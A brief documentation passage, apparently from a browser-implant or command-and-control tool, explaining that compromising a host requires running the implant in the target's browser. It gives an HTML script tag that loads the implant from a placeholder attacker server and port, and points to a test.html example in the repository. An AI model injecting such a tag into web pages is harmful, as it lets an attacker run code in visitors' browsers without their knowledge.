To compromise a host, you must execute the implant on the target browser.
This can be done easily using the following HTML tag to include the implant script:
<script src="http://<server_address>:<port>/<implant_id>.js"></script>
See an example in the test.htmlarrow-up-right file within the repo.
Last updated 3 years ago